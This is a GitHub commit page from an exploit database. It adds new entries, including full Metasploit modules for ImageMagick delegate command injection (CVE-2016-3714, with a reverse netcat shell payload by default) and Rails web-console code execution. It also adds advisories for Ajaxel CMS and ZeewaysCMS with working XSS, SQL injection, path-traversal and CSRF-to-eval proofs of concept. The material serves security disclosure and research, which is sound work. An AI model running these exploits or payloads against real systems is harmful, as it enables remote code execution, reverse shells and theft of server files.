Skip to content

Commit

Permalink
DB: 2016-05-10
Browse files Browse the repository at this point in the history 
11 new exploits

JITed egg-hunter stage-0 shellcode Adjusted universal for xp/vista/win7
JITed egg-hunter stage-0 shellcode Adjusted universal for XP/Vista/Windows 7

BlazeDVD 5.1- (.plf) Stack Buffer Overflow PoC Exploit - ALSR/DEP Bypass on Win7
BlazeDVD 5.1 - (.plf) Stack Buffer Overflow PoC Exploit (Windows 7 ALSR/DEP Bypass)

Winamp 5.572 - Local BoF Exploit (Win7 ASLR and DEP Bypass)
Winamp 5.572 - Local BoF Exploit (Windows 7 ASLR and DEP Bypass)

RM Downloader 3.1.3 - Local SEH Exploit (Win7 ASLR and DEP Bypass)
RM Downloader 3.1.3 - Local SEH Exploit (Windows 7 ASLR and DEP Bypass)

UFO: Alien Invasion 2.2.1 - BoF Exploit (Win7 ASLR and DEP Bypass)
UFO: Alien Invasion 2.2.1 - BoF Exploit (Windows 7 ASLR and DEP Bypass)

The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow Exploit (Win7 + ASLR Bypass)
The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow Exploit (Windows 7 + ASLR Bypass)

Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)
Mozilla Firefox 3.6.16 - mChannel Object Use After Free Exploit (Windows 7)

QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS
QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR BYPASS
GNU Bash - Environment Variable Command Injection (ShellShock)
Bash - Environment Variables Code Injection Exploit (ShellShock)
GNU Bash - Environment Variable Command Injection (Shellshock)
Bash - Environment Variables Code Injection Exploit (Shellshock)

OpenVPN 2.2.29 - ShellShock Exploit
OpenVPN 2.2.29 - Shellshock Exploit

Bash - CGI RCE Shellshock Exploit (Metasploit)
Bash CGI - RCE Shellshock Exploit (Metasploit)

PHP 5.x (< 5.6.2) - Shellshock Exploit (Bypass disable_functions)
PHP 5.x (< 5.6.2) - Bypass disable_functions (Shellshock Exploit)

OSSEC 2.8 - Privilege Escalation
OSSEC 2.8 - hosts.deny Privilege Escalation

ShellShock dhclient Bash Environment Variable Command Injection PoC
dhclient 4.1 - Bash Environment Variable Command Injection PoC (Shellshock)

OSSEC 2.7 <= 2.8.1 - Local Root Escalation
OSSEC 2.7 <= 2.8.1 - _diff_ Command Local Root Escalation

Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) offensive-security#2
Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (2)

BigTree CMS Cross Site Request Forgery Vulnerability

Advantech Switch Bash Environment Variable Code Injection (Shellshock)
Advantech Switch - Bash Environment Variable Code Injection (Shellshock)
KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Wow64 Egghunter Win7)
KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Win8.1/Win10)
KiTTY Portable <= 0.65.0.2p - Local kitty.ini Overflow (Wow64 Egghunter Windows 7)
KiTTY Portable <= 0.65.0.2p - Local kitty.ini Overflow (Windows 8.1/Windows 10)

Windows Null-Free Shellcode - Primitive Keylogger to File - 431 (0x01AF) bytes
Ajaxel CMS 8.0 - Multiple Vulnerabilities
i.FTP 2.21 - Host Address / URL Field SEH Exploit
Dell SonicWall Scrutinizer <= 11.0.1 - setUserSkin/deleteTab SQL Injection Remote Code Execution
ZeewaysCMS - Multiple Vulnerabilities
ASUS Memory Mapping Driver (ASMMAP/ASMMAP64): Physical Memory Read/Write
Certec EDV atvise SCADA Server 2.5.9 - Privilege Escalation
Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2)
RPCScan 2.03 - Hostname/IP Field SEH Overwrite PoC
ImageMagick Delegate Arbitrary Command Execution
Ruby on Rails Development Web Console (v2) Code Execution
  • Loading branch information
Offensive Security committed May 10, 2016
1 parent 69f4286 commit 01664c6
Show file tree
Hide file tree
Showing 12 changed files with 1,292 additions and 21 deletions.
52 changes: 31 additions & 21 deletions files.csv
View file

Large diffs are not rendered by default.

87 changes: 87 additions & 0 deletions platforms/multiple/local/39791.rb
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,87 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit

Rank = ExcellentRanking

include Msf::Exploit::FILEFORMAT

def initialize(info = {})
super(update_info(info,
'Name' => 'ImageMagick Delegate Arbitrary Command Execution',
'Description' => %q{
This module exploits a shell command injection in the way "delegates"
(commands for converting files) are processed in ImageMagick versions
<= 7.0.1-0 and <= 6.9.3-9 (legacy).
Since ImageMagick uses file magic to detect file format, you can create
a .png (for example) which is actually a crafted SVG (for example) that
triggers the command injection.
Tested on Linux, BSD, and OS X. You'll want to choose your payload
carefully due to portability concerns. Use cmd/unix/generic if need be.
},
'Author' => [
'stewie', # Vulnerability discovery
'Nikolay Ermishkin', # Vulnerability discovery
'wvu', # Metasploit module
'hdm' # Metasploit module
],
'References' => [
%w{CVE 2016-3714},
%w{URL https://imagetragick.com/},
%w{URL http://seclists.org/oss-sec/2016/q2/205},
%w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab},
%w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456}
],
'DisclosureDate' => 'May 3 2016',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' => {
'BadChars' => "\x22\x27\x5c", # ", ', and \
'Compat' => {
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic netcat bash-tcp'
}
},
'Targets' => [
['SVG file', template: 'msf.svg'], # convert msf.png msf.svg
['MVG file', template: 'msf.mvg'], # convert msf.svg msf.mvg
['MIFF file', template: 'msf.miff'] # convert -label "" msf.svg msf.miff
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_netcat',
'LHOST' => Rex::Socket.source_address,
'DisablePayloadHandler' => false,
'WfsDelay' => 9001
}
))

register_options([
OptString.new('FILENAME', [true, 'Output file', 'msf.png'])
])
end

def exploit
if target.name == 'SVG file'
p = Rex::Text.html_encode(payload.encoded)
else
p = payload.encoded
end

file_create(template.sub('echo vulnerable', p))
end

def template
File.read(File.join(
Msf::Config.data_directory, 'exploits', 'CVE-2016-3714', target[:template]
))
end

end
69 changes: 69 additions & 0 deletions platforms/php/webapps/39781.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,69 @@
Ajaxel CMS 8.0 Multiple Vulnerabilities

Vendor: Ajaxel
Product web page: http://www.ajaxel.com
Affected version: 8.0 and below

Summary: Ajaxel CMS is very simple ajaxified CMS and framework
for any project needs.

Desc: Ajaxel CMS version 8.0 and below suffers from multiple
vulnerabilities inlcuding LFI, XSS, SQL injection and remote
code execution via CSRF.

Tested on: Apache 2.4.10
MySQL 5.5.46

Vendor status:
[13.04.2016] Vulnerabilities discovered.
[14.04.2016] Vendor contacted.
[18.04.2016] Vendor releases patch for version 8.0 to address these issues.
[05.05.2016] Public security advisory released.

Vulnerability discovered by Krzysztof 'DizzyDuck' Kosinski
[dizzyduck_at_zeroscience.mk]


1. Reflected XSS:
-----------------

GET /cmsj9bwp'-alert(1)-'xvjry=mods/ HTTP/1.1
Host: 192.168.10.5

HTTP/1.0 404 Not Found
...
...var Conf={LANG:'en', TPL:'default', DEVICE:'pc', SESSION_LIFETIME:7200,
USER_ID:1, URL_EXT:'', HTTP_EXT:'/', FTP_EXT:'/',
REFERER:'/cmsj9bwp'-alert(1)-'xvjry=mods', VERSION:8.0,
URL_KEY_ADMIN:'cms',...


2. SQL Injection:
-----------------

http://192.168.10.5/cms=mods/tab=ai?mods_ai_tab_ai-submitted=1&f=<SQLi>


3. Local File Disclosure:
-------------------------

http://192.168.10.5/?window&cms=templates&popup=1&file_folder=cms&folder=&file=../../../../../../../../../../../../etc/passwd


4. Cross-Site Request Forgery - RCE PoC:
----------------------------------------

<html>
<body>
<form action="http://192.168.10.5/cms=settings_eval_tab/tab=eval/load"
method="POST">
<input type="hidden" name="data&#91;eval&#93;"
value="phpinfo&#40;&#41;&#59;" />
<input type="hidden" name="a" value="eval" />
<input type="hidden"
name="settings&#95;eval&#95;tab&#95;eval&#45;submitted" value="1" />
<input type="submit" value="Execute" />
</form>
</body>
</html>

94 changes: 94 additions & 0 deletions platforms/php/webapps/39784.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,94 @@
ZeewaysCMS Multiple Vulnerabilities


[Software]

- ZeewaysCMS


[Vendor Product Description]

- ZeewaysCMS is a Content Management System and a complete Web & Mobile Solution developed by Zeeways for Corporates,
Individuals or any kind of Business needs.


- Site: http://www.zeewayscms.com/


[Advisory Timeline]

[25.03.2016] Vulnerability discovered.
[25.03.2016] Vendor contacted.
[29.03.2016] Follow up with the vendor.
[29.03.2016] Vendor responded asking for details.
[29.03.2016] Advisory and details sent to the vendor.
[06.04.2016] Follow up with the vendor. No response received.
[06.05.2016] Public security advisory released.


[Bug Summary]

- Directory Traversal

- Cross Site Scripting (Stored)


[Impact]

- High


[Affected Version]

- Unknown


[Tested on]

- Apache/2.2.27
- PHP/5.4.28


[Advisory]

- ID: ZSL-2016-5319
- URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5319.php


[Bug Description and Proof of Concept]

- ZeewaysCMS suffers from a file inclusion vulnerability (LFI) when encoded input passed thru the 'targeturl' GET
parameter is not properly verified before being used to include files. This can be exploited to include files from
local resources with directory traversal attacks and URL encoded NULL bytes.
https://en.wikipedia.org/wiki/Directory_traversal_attack

- Multiple cross-site scripting vulnerabilities were also discovered. The issue is triggered when input passed
via multiple parameters is not properly sanitized before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in context of an affected site.
https://en.wikipedia.org/wiki/Cross-site_scripting


[Proof-of-Concept]

1. Directory Traversal:

http://localhost/demo//createPDF.php?targeturl=Ly4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2Q=&&pay_id=4&&type=actual
Parameters: targeturl (GET)

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

2. Cross Site Scripting (Stored)

http://localhost/demo/profile
Parameters: screen_name, f_name, l_name, uc_email, uc_mobile, user_contact_num (POST)

Payload(s):
Content-Disposition: form-data; name="screen_name"

"><script><<imgIMG SRC=oi onerror=JaVaScript:alert(1)>

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

All flaws described here were discovered and researched by:

Bikramaditya Guha aka "PhoenixX"
87 changes: 87 additions & 0 deletions platforms/ruby/remote/39792.rb
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,87 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'Ruby on Rails Development Web Console (v2) Code Execution',
'Description' => %q{
This module exploits a remote code execution feature of the Ruby on Rails
framework. This feature is exposed if the config.web_console.whitelisted_ips
setting includes untrusted IP ranges and the web-console gem is enabled.
},
'Author' => ['hdm'],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://github.com/rails/web-console' ]
],
'Platform' => 'ruby',
'Arch' => ARCH_RUBY,
'Privileged' => false,
'Targets' => [ ['Automatic', {} ] ],
'DefaultOptions' => { 'PrependFork' => true },
'DisclosureDate' => 'May 2 2016',
'DefaultTarget' => 0))

register_options(
[
Opt::RPORT(3000),
OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', '/missing404' ])
], self.class)
end

#
# Identify the web console path and session ID, then inject code with it
#
def exploit
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path),
'method' => 'GET'
}, 25)

unless res
print_error("Error: No response requesting #{datastore['TARGETURI']}")
return
end

unless res.body.to_s =~ /data-mount-point='([^']+)'/
if res.body.to_s.index('Application Trace') && res.body.to_s.index('Toggle session dump')
print_error('Error: The web console is either disabled or you are not in the whitelisted scope')
else
print_error("Error: No rails stack trace found requesting #{datastore['TARGETURI']}")
end
return
end

console_path = normalize_uri($1, 'repl_sessions')

unless res.body.to_s =~ /data-session-id='([^']+)'/
print_error("Error: No session id found requesting #{datastore['TARGETURI']}")
return
end

session_id = $1

print_status("Sending payload to #{console_path}/#{session_id}")
res = send_request_cgi({
'uri' => normalize_uri(console_path, session_id),
'method' => 'PUT',
'headers' => {
'Accept' => 'application/vnd.web-console.v2',
'X-Requested-With' => 'XMLHttpRequest'
},
'vars_post' => {
'input' => payload.encoded
}
}, 25)
end
end
Loading

0 comments on commit 01664c6

Please sign in to comment.